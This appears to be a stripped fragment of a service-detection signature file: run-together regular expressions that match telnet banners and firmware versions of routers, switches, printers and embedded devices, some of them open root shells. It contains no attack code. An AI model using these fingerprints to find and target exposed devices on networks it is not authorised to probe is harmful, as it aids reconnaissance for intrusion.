+\xff\xfb\x01\xff\xfb\x03\r\n\r\n\[ORiNOCO-AP-(\d+)[-\d]*\]> Please enter password: +\xff\xfb\xfd\xff\xfb\x01\n\r\n\rFabric OS \(tm\) Release v([\w.]+)\n\r\n\r +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix MSS100 Version V([\d.]+)/\d+\(\d+\)\n\r\nType HELP at the 'Local_2> ' prompt for assistance\.\n\r\n\r\n\nUsername> +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\r\0\r\n\x07# \0 +\xff\xfb\x01OPTIBASE MGW5100 COMMAND LINE INTERFACE\r\n +PC Telnetd ([\d.]+)\r\n\r\nlogin: +rsconfig: port rose not active\n\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\"\r\nLinuxNode v([\d.]+) \(([-\w_.]+)\)\r\n\r\nlogin: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) Built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n/bin # +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \([^)]+\) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\nermittle die aktuelle TTY\r\ntty is \"/dev/pts/0\"\r\nConsole Ausgaben auf dieses Terminal umgelenkt\r\n# +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \(2006\.02\.15-21:18\+0000\) Built-in shell \(msh\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n# +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\nRouter> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nAmiNET\d+ login: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\x07HP (\w+) Ethernet SNMP Module\r\n ROM B\.([\d.]+)\r\n EEPROM A\.([\d.]+)\r\n HW B\.([\d.]+)\r\n\r\nEnter password: +USR5450 Telnet server v([\d.]+)\n\r\nPassword : +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\d\d-\w+-\d+ \d\d:\d\d:\d\d %MSCM-I-NEWTERM: New TELNET connection from (?:[\d.]+)\r\r\nPassword: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\0\n\nLantronix ETS16 Version V([\d.]+)/\d+\(\d+\)\n\r\0\nType HELP at the 'BRTR-ETS16>' prompt for assistance\.\n\r\0\nUsername> +\r\nWelcome to slush\. \(Version ([\d.]+)\)\r\n\r\n\r\n\xff\xfb\x01\xff\xfb\x03([-\w_. ]+) login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[0m\x1b\[2J\x1b\[2;66H\x1b\[1m\x1b\[21;1H\x1b\[0m-+\x1b\[22;2H\x1b\[0mFunction:\x1b\[23;2H\x1b\[0mMessage:\x1b\[24;2H\x1b\[7mCTRL\+R = Refresh +\x1b\[8;12H\x1b\[0mIBM BladeCenter 4-Port Gb Ethernet Switch Module Console +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0;1H\x1b\[J\x1b\[1;1H\x1b\[0m =+\r\n AT-8326GB Management System Version ([\d.]+) \r\n Remote - Telnet\r\n +\r\nEfficient 5851 SDSL \[ATM\] Router \(5851-\d+\) v([-\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Login: +NPC Telnet permit one connection\.\r\n But One connection\(\) already keep alive\.\r\nGood Bye !! \r\n +\xff\xfb\x01\r\nWelcome to NetLinx v([\d.]+) Copyright AMX Corp\. \d+-\d+\r\n> +\r\nSiemens \d+ T1E1 \[COMBO\] Router \(([-\d]+)\) v([\d.]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfd\x18\xff\xfb\x01\x1b\[2J\x1b\[\?7l\x1b\[4;23r\x1b\[\?6l\x1b\[1;1H\x1b\[\?25l\x1b\[1;1HCopyright \(C\) 1991-1994 Hewlett-Packard Co\. All Rights Reserved\. +\xff\xfc\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfb\x18\xff\xfd\x1f\xff\xfb\x1f\xff\xfb\"\xff\xfb\x05\r\nCLI access not allowed until the SCC is active\.\r\n\r\n +\xff\xfb\x01\n?\r\n\r?VxWorks login: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nVxWorks login: +\xff\xfb\x01\r\n\rPassword: | p|ZyXEL Prestige/Efficient Speedstream adsl router telnetd +\xff\xfb\x03\xff\xfb\x01password: +\r\n\xff\xfb\x01Enter password: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\w+ login: +\xff\xfb\x01\xff\xfb\x03\r\n\(\w+\) \r\nUser: +login: \xff\xfb\x01\xff\xfb\x03| p|USRobotics/Sagem router telnetd +\xff\xfb\x01\xff\xfb\x03\xff\xfb\0\xff\xfd\0login: +220 FTP server \(ver 1\.0\) ready\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on dslmodem login: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\xff\xfd\x18 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nlogin: +\r\nSystem unavailable\. Please try later\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n(FVS\w+) login: +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03Login Name: +\xff\xfb\x01\xff\xfe\"\r\n\* +\xff\xfb\x03\xff\xfb\x01\r\n Disconnecting\.\.\.\r\n\n +\xff\xfb\x01\xff\xfb\x03\x1b\[2J\x1b\[0;0H\x1b\[K\x1b\[7mTelnet configuration RELEASE ([\d.]+)\x1b +Telnet server disabled\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03\r\r\n([\w._-]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfb\x01\xff\xfb\x03([\w._-]+) login: +\r\n.*Based\(loosely\) on CircleMUD ([\d.]+) +\r\n.*Based on CircleMUD ([\w._-]+),\r\n +\x1b\[0;37;40m\x1b\[2J\x1b\[0;37;40m\x1b\[1m\x1b\[15;22HAT-(\w+), version ([\d.]+)\x1b +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0;0H\x1b\[0J\x1b\[0;0H\x1b\[0J\x1b\[1;28HAT-([-\w_.]+) Login Menu\x1b\[5;18HAT-[-\w_.]+ Local Management System Version ([\d.]+) \x1b +\xff\xfd\x03\xff\xfb\x01\x1b\[2J\x1b\[1;1H\x1b\[0m\x1b\[\?3l\x1b\(0\x1b\[2;40H\x1b\(B\x1b\(0\x1b\[2;28H\x1b\(BCSX([-\w_.]+) Local Management\x1b\[0m\x1b\(0\x1b\[5;24H\x1b\(BCABLETRON Systems, Incorporated\x1b +\xff\xfb\x01\n\rno data rcvd for version string\n\rrecv version id unsuccessful\n\rSSH Session task 0x\w+: Version Exchange Failed\n\r +\r\nSorry, this system is engaged\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on \(none\) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nBusyBox on ([-\w_.]+) login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\n\r\nBusyBox v([-\w_.]+) \( +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r\nBusyBox v(.*) Built-in shell \(ash\)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\(none\) login: +\xff\xfb\x01Hummingbird Communications Ltd\., Windows NT, Telnetd Version ([\d.]+) \(([-\w_.]+)\)\r\n\r\n login: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Login Name: +\xff\xfb\x01\xff\xfb\x03\r\nUser Access Verification\r\n\r\nPlease Enter Password: +\xff\xfb\x01\xff\xfb\x03BR-telnet@FI_Core> +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\x1b\[\?3l\x1b\[2JPlease enter your user name and password!! \r\n\r\nLogin: +\xff\xfb\x01\r\nD-Link Access Point login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03.*\r\n([-\w_.]+) login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Login failed\.\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\nPON 262194 PAAMCO (TA \w+) Gen3\r\n\n\n\ruser: +\xff\xfd\x03\xff\xfb\x03\xff\xfd\x01\xff\xfb\x01\r\n\r\r\nUser Name: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ([-\w_.]+)\n\r +\*+\n\r\n\rD-Link Corp\., Inc\. Software Release ([-\w_.)(/]+)\n\rCopyright \(c\) \d+-\d+ by D-Link Corp\., Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\r\nUsing telnet exposes your password\. Using ssh is a safer choice\.\r\n\r\nUsername: +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01\r\n\r\nPIX passwd: +\xff\xfb\x01\r\n#-+\r\n# Tasman Networks Inc\. Telnet Login\r\n# +\xff\xfd\x03\xff\xfb\x01\r\n\r\n\t\tWelcome to P333R\r\n\t\tSW version ([\d.]+)\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm7000 Helenite \d+ \(based on [-\w_.]+\)\r\n\rwelcome on your dreambox! - Kernel ([-\w_.]+) +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\n\r[ *\r\n]*Welcome on your dreambox! - Kernel (\d[\w.]+) +\xff\xfe\"\xff\xfb\x01 \x1b\[H\x1b\[J\x1b\[3;1HCB-1000 S/N: (\d+)\x1b\[3;56HSymbol Technologies, Inc\.\x1b\[4;1HVersion ([-\w_.]+)\x1b\[4;44HEthernet HW address ([\w:]+)\x1b\[21;1H +\x1b\[\?25l\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H\x1b\[2;1H\x1b\[3;1H\x1b\[4;1H ### ### ########### ########## ############# ########### ###\x1b\[5;1H #### ### ############# ############ ############# ########### ###\x1b\[6;1H[ #]{70}\x1b\[7;1H[ #]{70}\x1b\[8;1H[ #]{70}\x1b\[9;1H[ #]{70}\x1b\[10;1H[ #]{70}\x1b\[11;1H[ #]{70}\x1b\[12;1H[ #]{78}\x1b\[13;1H[ #]{78}\x1b\[14;1H\x1b\[15;1H\x1b\[16;1HEnter Ctrl-Y to begin\.\x1b\[18;3H\*{35} +\xff\xfb\x01\x1b\[2J\x1b\[0m\x1b\[1;1H \*\*\*\*\* \*\*\* \* \* \*\*\*\*\* \*\*\*\*\*\*\*\*\* \*\*\* +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to D-Link Wireless Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0+\r\nServer Model : ([\w._+-]+)\0+\r\nF/W Version : ([\w._-]+)\0.\0+\r\nMAC Address : ([\w ]+) +\xff\xfb\x01\xff\xfb\x03\r\n\r\n\x1b\[H\x1b\[JWelcome at ActiveFax Server\.\r\n\r\n +\xff\xfb\x01\xff\xfb\x03RemoteX Telnet Server V([\d.]+)\n\r\n\rc:\\> +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r +\*+\n\r +Welcome to ZXDSL 831\n\r +\*+\n\r\n\rZTE Corporation, Software Release VIK-([-\w_.]+)\n\r +\*{60}\r\n\r\nThis session allows you to set the TCPIP parameters for your\r\nDell Laser Printer Printer Dell (\w+) MFP Ethernet internal network device, with a hardware\r\naddress of ([0-9A-F:]{17}) \(MSB, Canonical\)\.\r\nIt's an ethernet card\.\r\nNetwork Firmware Version is V([\w._-]+)\(\w+ MFP\) ([\d-]+)\.\r\nSystem Up Time is ([^\r\n.]+)\.\r\n\r\n +\xff\xfb\"\xff\xfb\x03\xff\xfb\x01\xff\xfb\0\xff\xfd\0\n\r\nWelcome to the PDP-10 simulator\r\n\n +\xff\xfb\x01\(Enable\) Password\? +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\r\nCGX3224 Switch Manager Console\. Version: CGX([\d.]+) Bld (\d+),.*\r\n\r\nPassword: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\x1b\[0m\x1b\[2J\x1b\[01;00H\r\n\r\0\r\n\r\0[ \t]+\r\n\r\0\r\n\r\0\r\0VersaXpress HPNA Routing Concentrator\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nSportster Pro ([\d.]+) Image Sagem D-BOX2 - Kernel ([-\w_.]+) +\xff\xfb\x01\xff\xfb\x03\r\0\n\*\*\* Lantronix Universal Device Server \*\*\*\r\0\nSerial Number (\d+) MAC address ([\w:]+)\n\r\0Software version 0*([\d.]+) \((\d+)\)\r\0\n\r\0\nPress Enter to go into Setup Mode \r\0\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Fritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nFritz!Box web password: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([-\w_+. ]+) Date: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nDD-WRT v([^\r\n]+)\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03DD-WRT (v\d+)[^\r\n]*\r\nRelease: ([^\r\n]+)\r\n\xff\r\ngateway login: +\xff\xfd\x18\xff\xfd \xff\xfd#\xff\xfd\x1f\xff\xfd'\xff\xfd\ +\xff\xfb\x03\xff\xfb\x01\r\n\r\nU\.S\. Robotics\r\nTotal Control \(tm\) NETServer 8/16\r\n\r\nlogin: | p|USRobotics TotalControl NetServer 8/16 telnetd +\xff\xfb\x01\r\n\r\n\*\*\* ADTRAN TSU ESP \*\*\*\r\n\r\n ENTER PASSWORD -> \xff\xfd\x03\xff\xfb\x03 +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\r\n\nLantronix (SCS\d+) Version V([\d/().]+)\n\r\nType HELP +\xff\xfb\x03\xff\xfb\x01\r\n\r\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 1998-2006 Huawei Technologies Co\., Ltd\. All rights reserved\. \*\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X2301 version V\.([-\w_+. ()]+) IPSec from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r *\**\n\r *Welcome to Viking II\. \n\r *\**\n\r\n\rGlobespanVirata Inc\., Software Release VIK-([-\w_.]+)\n\r +\xff\xfb\x01\xff\xfe\x01\xff\xfd\x03\xff\xfb\x03\x1b\[1;1H\x1b\[J\x1b\[22;0H>\x1b\[1K\x1b\[999D\r\0login: +\x1b\[2J\x1b\[1;1fATOS Telnet Server\r\n\r\nCTRL\+d to exit\n\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03Init Command Line Interface\.\. \r\nBoot Version: [\d.]+\r\nBoot Date: [\d :/]+\r\nATOS Version: ([\d.]+) \([^)]+\)\r\nATOS Date: [\d :/]+\r\nHardware: \w+\r\nProduct Code : \d+\r\nSerial Number : (\d+)\r\nLAN0 MAC Address : ([A-F0-9:]+)\r\nADSL Modem SW version: [\w._-]+ *\r\nADSL Modem API version: \d+\r\nADSL Driver version: [\w._-]+\r\n([\w._-]+) release: ([\w._-]+)+\r\nHW encryption not supported\r\nVinetic fw version : [\w._-]+\r\n\r\nUser name : +\xff\xfb\x01\xff\xfe\x01\n\r\n\r\n\r\n\n\n\n\r\t=+\n\r\t +Samsung SWL-6100AP Configuration\n\r\t +\xff\xfb\x01\xff\xfb\x03\r\0\nMAC address (\w+)\n\r\0Software version ([\w._-]+ \(\d+\)) XPTEXE\r\0\n\n\r\0Press Enter to go into Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03USR ADSL Gateway\r\nLogin: +\xff\xfb\x03\xff\xfb\x01\r\nService Processor login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03ADSL2\+ Wireless Router (\w+) \r\nSoftware Version: ([\w.]+)\r\nLogin name: +\xff\xfb\x01Symbol Access Point User/Admin password: +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x18\xff\xfd\x1f\xff\xfd \xff\xfd!\xff\xfe\"\xff\xfc\"Username Access Verification\r\n\r\nLogin : +\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\xff\xfb\x05\xff\xfd\x05Welcome to Telnet Server ([\w._-]+)\r\n\x1b\[0m\x1b\[2J\x1b\[05;28H(SM\w+) Managed Switch\x1b\[07;22H\x7fTallahasseeAdmin-Block\x1b\[15;30Husername:\x1b\[17;30Hpassword:\x1b\[15;39H +\r\n\r\nPassword required, but none set\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\xff\xfd\x18\xff\xfd\x1fWelcome to your TiVo\r\n\r\n=\[tivo:root\]-# +\xff\xfa\x18\x01\xff\xf0\xff\xfb\x01\xff\xfb\x03AMBIT Cable Modem\r\n\r\nlogin: +refused in\.telnetd from [-\w_.]+ logged\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Access DENIED\.\r\n +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;.*Business Policy Switch 2000 +BeanShell ([-\w_.]+) - by Pat Niemeyer \(pat@pat\.net\)\nbsh % +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\xff\xfd\x1f\r\n\(Aruba800\) \r\nUser: +\xff\xfb\x01\x1b\[1;1H\x1b\[2K\x1b\[2;1H\x1b\[2K\x1b\[3;1H\x1b\[2K\x1b\[4;1H\x1b\[2K\x1b\[5;1H\x1b\[2K\x1b\[6;1H\x1b.*BayStack 420 +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03SHARP (MX-\w+) Ver ([-\w_.]+) TELNET server\. +\xff\xfb\x01\xff\xfb\x03Welcome to (DCS-\w+) telnet daemon\r\n\r\nPassword: +\xff\xfb\x01\r\nVoIP Phone V([-\w_.]+) settings\r\nPassword: +\xff\xfb\x01\r\nAIRAYA login: +\xff.\x01\0?\xff\xfd.*Welcome to ViewStation.*Password: +AD6680 Gateway Software\r\n[-\w_]+ \(MAC ([\w:]+)\)\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nHP ProLiant BL p-Class C-GbE2 Interconnect Switch A\.\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Netgear DM111 ADSL2\+ Modem \r\nSoftware Version: ([-\w_.]+)\r\nLogin name: +\xff\xfb\x03\xff\xfb\x01\r\n\r\n\*+\r\n\* Welcome to Print Server \*\r\n\* +Telnet Console +\*\r\n\*+\r\n\r\nServer Name : ([\w._-]+)\0\0\0\0\0\0\r\nServer Model : 2U1P Print Server\0+\r\nF/W Version : ([\w._-]+).*\r\nMAC Address : ([\w ]+) +\xff\xfb\x03\xff\xfd\x03\xff\xfb\x01\r\n\r\nMMC Technology Telnet\r\nMW-3000AP \w+\( Combo ([-\w_.]+) \)\r\n\r\n +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\n\r.*\n\r\n\rSoftware Release R([-\w_.]+)\([^)]+\)\n\rCopyright \(c\) 2001-2003 by D-Link, Inc\.\n\r\n\rlogin: +\xff\xfb\x03\xff\xfb\x01\r\nWelcome to the WhatRoute TELNET Server\.\r\n +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\nCNU-550pro login: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03picotux login: +\xff\xfb\x03\xff\xfd\x18\xff\xfb\x01\xff\xfd\x1f\xff\xfd!\r\nCadant C3 CMTS\r\n +\r\n\(c\) Copyright 2005, Extron Electronics, IPL T S2, V([\d.]+), +\xff\xfb\x01\xff\xfb\x03\r\n.*HM410dp ADSL2\+ Router\r\n\r\nLogin: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03NS-30G Ver ([-\w_.]+) TELNET server\.\r\0\nCopyright \(c\) \d+ KYOCERA +\xff\xfb\x01\xff\xfb\x03\xff\xfd\x03\r\n\r\n\r\nWelcome to X4100 version V\.([-\w_.]+) Rev\. (\d+) \(Patch (\d+)\) from [\d/]+ [\d:]+\r\nsystemname is ([-\w_.]+), +\xff\xfe\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfb\x03\xff\xfb\x01\r\nZyXEL Corporation Embedded Telnet Server \(c\) 2000-2003\r\n +\xff\xfb\x01\xff\xfb\x03\*\*\* Lantronix UDS1100 Device Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) \r\0\nPassword : +\xff\xfb\x01\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\xff\xfd\x18\xff\xfd\x1f\r\n\*+\r\n\* Copyright\(c\) 2004-2006 3Com Corp\. and its licensors\. +\xff\xfd\x03\xff\xfb\x01\r\n\r\nProduct type: Avaya (\w+) Media Gateway Release ([\w._-]+)\r\n\r\n\r\n\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nPLi dm500 Jade \d+ \(based on ([\w._-]+)\)\r\n\rwelcome on your dreambox! - Kernel ([\w._-]+) \([\d:]+\)\.\r\n\rdm500 login: +\r\nSorry, this system is engaged by a rlogin session\.\r\nHost IP address: ([\d.]+)\.\nLogin name: ([\w._-]+)\.\n +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x03\xff\xfb\x01.*\r\n\r\nUser Access Verification\r\n\r\nUsername: +Connected\r\nUse log command to LOGON\r\n +\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) Command Shell\r\nPassword: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03Grandstream ([\w-]+) V([\w.]+) Command Shell +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03AH4021\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0SNTP Version ([\d.]+) Server ([\w._-]+)\n\r\0\r\0\nMAC address (\w+)\n\r\0Software version V[\d.]+ \(\d+\) ([\w._-]+)\r\0\nPassword : +uShare \(([\w._-]+)\) \(Built .*\)\nFor a list of registered commands type \"help\"\n\n> +SMPlayer ([\w._-]+)\r\nType help for a list of commands\r\n +Sorry, already connected\.\r\n| p|Slirp PPP/SLIP-on-terminal emulator telnetd +\xff\xfb\x03\xff\xfb\x01\xff\xfb\x01\xff\xfb\x03\r\nCopperJet ([\w._-]+) RouterPlus .*\r\nFirmware version: ([\w._ -]+)\r\nAllied Data Technologies\r\n\r\nPlease login: +\xff\xfb\x01\xff\xfb\x03Welcome to the Windows CE Telnet service on MP370\r\n\r\nPocket CMD v ([\w._-]+)\r\n\\> \n\r\n\\> \\> +\xff\xfb\x01\r\n3Com Access Point 7760 login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 login: +\xff\xfd\x03\xff\xfb\x01\xff\xfb\x03PRICOM 3100 Ver ([\w._-]+) TELNET server\.\r\0\nCopyright \(C\) 2002-2004 silex technology, Inc\.\r\0\nlogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n\r\r\n\r\r\nWelcome to Aerohive Wireless Product\r\r\n\r\r\nlogin: +\xff\xfb\x01\xff\xfb\x03\r\nLexmark International Telnet\r\n\r\nlogin: +\xff\xfb\x03\xff\xfb\x01Alcatel-Lucent: A7510\r\nA7510_(R\d+) .*\r\n\r\n\r\nLogin: +\xff\xfd\x18\xff\xfd\x1f\xff\xfd!\xff\xfd\x17\xff\xfb\x01\xff\xfb\x03\xff\xfd \xff\xfd#\r\n\r\n Welcome to OpenVMS \(TM\) VAX Operating System, Version V([\w._-]+) \r\n\r\n\r\0Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\n>>> System ([\w._-]+) - OpenVMS Alpha V([\w._-]+) <<<\r\n\r\n\rUsername: +\xff\xfb\x01\xff\xfd\x03\xff\xfb\x03\r\nGbE2c L2/L3 Ethernet Blade Switch for HP c-Class BladeSystem\.\r\n\r\nCopyright\(C\)2003 Hewlett-Packard Development Company, L\.P\.\r\n\r\n\r\nEnter tacacs username: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03U\.S\. Robotics ADSL 4-Port Router\r\nLogin: +\xff\xfb\x01\xff\xfb\x03\n\r\0\*\*\* Mitsubishi ProjectorView Server \*\*\*\r\0\nMAC address (\w+)\n\r\0Software version V([\w._-]+) \((\d+)\) MELCO\r\0\n\n\r\0Press Enter for Setup Mode \n\r\0 +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\n === IMPORTANT ============================\r\n Use 'passwd' to set your login password\r\n this will disable telnet and enable SSH\r\n ------------------------------------------\r\n\r\n\r\nBusyBox v(.*) built-in shell \(ash\)\r\nEnter 'help' for a list of built-in commands\.\r\n\r\n ___ ___ ___ \r\n\( _`\\ _ /'___\)'___\) Bifferboard mini-distribution v([\w._-]+)\r\n +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03 =======================\r\n DSL-500B \r\n =======================\r\nLogin: +\xff\xfd\x01\xff\xfd\x1f\xff\xfd!\xff\xfb\x01\xff\xfb\x03\r\r\nWelcome to Linux \(ZEM500\) for MIPS\r\n\rKernel ([\w._-]+) \w+ on an MIPS\r\n\rZEM500 login: +\xff\xfb\x01\xff\xfe\x01Connected\r\n\n\rAironet BR500E V([\w._-]+) Main Menu +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03login: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03TrioLink \(ADSL IAD\)\r\nLogin: +Linux ([\w._-]+) \[INSTALL: [\d-]+\]\nLASTPATCH: [\d:-]+\n +\xff\xfb\0\xff\xfd\0\xff\xfb\x01\xff\xfd\x01\xff\xfb\x03\xff\xfd\x03\x1b\[0;37;40m\x1b\[2J\x1b\[1;1HLogin Name: +\xff\xfd\x01\xff\xfd!\xff\xfb\x01\xff\xfb\x03Xcelerator IP \r\nLogin: +odec=\d+ u=\d+, p=\d+, i=\d+, max entries = \d+ \r\n\d+: IMGREQUEST: request_stats, image buffers available = \d+ \r\n\d+: MAIN: (\d+) images\(J=\d+, P=\d+, I=\d+\) stored on disk in last minute +\r\nSiemens 5940 T1E1 \[COMBO\] Router \([\w._-]+\) v([\w._-]+) Ready\r\n\xff\xfb\x01\xff\xfb\x03\xff\xfd\x01\xff\xfe\x01Username: +\xff\xfb\x01\xff\xfb\x03\r\n\r\nWelcome to Dinion-IP-NWC [\d.]+ from [\d.]+\r\n +\xff\xfb\x03\xff\xfb\x01\xff\xfe\x01\xff\xfd\0\r\nser2net port \d+ device (/dev/[-\w_]+) \[\d+ \w+\] \(Debian GNU/Linux\)\r\n +\xff\xfb\x01\xff\xfb\x03\xff\xfe\x01\n\rTerminal shell v1\.0\n\r\rCopyright \xa92008 Motorola, Inc\. All rights reserved\.\n\r\rNetopia Model ([\d-]+)(?: AnnexA)? High-Power Wireless DSL Ethernet Managed Switch\n\rRunning Netopia SOC OS version ([\w.-]+ \(build \w+\))\n +\xff\xfb\x01\xff\xfb\x03ssss ssss sss s ss sss sss sss sssss \r\n s s s s s s s s s s s s s \r\n s s s s s s s s s s s \r\n s s ss s ss ssss s sss s ssss s s sss \r\n s s s s s s s s s s s s s s s \r\n s s s s s s s sss s s s s s s \r\n 